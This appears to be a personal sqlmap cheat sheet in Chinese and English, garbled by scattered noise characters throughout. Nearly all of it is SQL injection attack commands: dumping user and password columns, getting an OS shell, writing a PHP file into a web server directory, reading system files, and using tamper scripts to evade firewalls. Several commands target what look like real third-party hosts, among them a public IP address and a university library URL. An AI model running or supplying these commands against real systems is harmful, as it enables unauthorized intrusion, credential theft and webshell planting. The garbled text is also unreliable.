/pentest/database/sqlmap
F4 l5 d5 b; Q1 ]7 }6 f0 _& H) G& U0 S# ~, Y4 c* T' n1 Q
update :::::> in the folder after execute following order : svn update. Q5 _3 T; U& t
; i* S6 W' U0 i6 t% Y K) V; I
sqlmap.py -r 1.txt --current-db' {: _' E& \/ n
/ H0 V6 ^' K; U) {' C/ b: n
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”7 n- M$ b4 H1 i5 I$ e
& ?0 h3 B$ @; v& _/ _4 j
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
4 [( \- [# D) M3 }: e猜解数据库3 I! Y' X p( w( I
./sqlmap.py -u "injection-url" --dbs+ O# v1 N$ \- h& E6 U
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"+ T1 A% a6 ~* o& K9 w+ k. z3 ?; _
- Y% A/ z. v. [. R f猜解表名- p$ o9 r4 }& F: X& R
./sqlmap.py -u "injection-url" -D database_name --tables
# ]$ u) t8 _; Y$ _
1 t1 _" |. ?# D$ y# u" Psqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
" R- S) {( D b5 y- g+ F8 |sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" 0 }, Z, p" C5 k: R( @: t
& u$ k: a; I) m! R! b
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 ]; B1 G. J9 |6 R$ S' x
9 m# ^4 q! e5 s/ G& v% b5 Ysqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py", y5 ^# O( `& j( c2 |9 t7 X
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
7 W+ \8 d2 z/ V" Dsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" . M1 h u: i* n+ F! h6 v
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py". D2 u8 N: l5 ^' G; ?! g
2 h# n* A# L8 Q2 ~& w, Gsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"/ M9 ~! L$ s: n, m
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"6 |8 O9 B: J) N8 ?1 w3 @ l
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
5 ~, }0 F' {: Ysqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
3 I0 d/ \( }8 C& j& E+ Rsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump9 K3 k- w0 ` e* ]2 {' X
( \( [9 S) @8 P0 z& A
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
: H& N2 o' P& |. m" f4 lsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"+ v2 T$ R) ?5 H: z+ b) J: @& _) E
1 D3 G1 J2 A# e" S' @6 l
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"0 l& \+ v. w/ L1 U0 I
猜解列名. S# e) V! a3 B& p4 A
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns4 L. [: e# y. n, c* U
( _4 ~" s7 @# U5 X2 K- H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% c2 G( D3 U" C+ L/ i; `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" 3 X7 q# w. K2 M4 G
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 Y$ C: y% C. h, T- `- B4 g9 x Y1 k1 }- |! [. {
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
7 w8 ~ H' Y& T; g&submit=Go
1 `% H; L7 Z" f6 B; h猜解值
8 T8 r, @# x- w/ F$ I; _3 |./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
( Z, d2 P" x' C7 w========================================================
$ j! L- @1 p ^+ r搜索表名中包括mana字符的$ {0 i' ^7 h# ]& h% m Z
/sqlmap.py -u "injection-url" -T mana --search/ F6 p" A% {: m/ V5 L
返回一个交互式sql shell
3 ~. ?$ g" L8 X+ E# c- X1 e/ C/sqlmap.py -u "injection-url" --sql-shell- L1 q& I0 J$ ]+ y* R4 ~
读取指定文件(需权限)8 ]( c. P; o6 Q9 q/ E% |% h* Y, y/ c
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 J' R6 x- x* q& U7 d& J: O查看当前 用户 及 数据库 7 P# j" F& g, }0 k. T
/sqlmap.py -u "injection-url" --current-user --current-db
& R4 g$ n* }+ }3 ?本地文件 写入 远程目标绝对路径: `# {9 b( F6 ^+ ~. @
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径( ?: A& h8 y; N
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" + j: k* M5 @) i$ W2 A c% S: ~
$ Z6 L( M' J7 }# @& H3 Isqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径 V. l$ {4 c/ I9 h$ [" w
查看某用的权限" s" v$ B! H+ p) ]
/sqlmap.py -u "injection-url" --privileges -U root2 E" L4 u) o9 J5 ?/ S
查看当前用户是否为dba% d6 a5 I, o5 c# [2 H% Y+ Q
/sqlmap.py -u "injection-url" --is-dba
- l4 e' B( f- i- X) x8 ]) p读取所有数据库用户或指定数据库用户的密码3 Z+ m8 J& v4 i4 d+ t, w' W7 Z6 d! ^
sqlmap.py -r 1.txt --users --passwords
7 u9 }* H( c1 l$ v2 y4 ysqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 m* C/ R E* q- V+ t+ N
4 j7 U7 N" G# _/sqlmap.py -u "injection-url" --passwords -U root' ]( i& @3 G* K( o
3 @8 C1 }, C+ c5 Z/ M
--start&&--stop 与 --first&&--last 的区别8 ?8 n$ u5 x' a, p8 ?3 U( F4 v8 P
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)0 g& G. u7 w9 N# D% k6 R" C2 G
" N% p- Q; x/ P. U @. J7 p* }从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)9 U9 L+ B0 J) w: u
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
3 x; s0 D3 j) L4 {/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 Y5 y% e4 u0 H" N; p! Z6 B/ T% q% Y! s, J( s
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……): O# n* I; r: L- J* k1 M0 a, @
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
9 Z2 _' L4 X* U6 D6 g v7 O) y0 U8 y N) ^ b# ~& e% v
|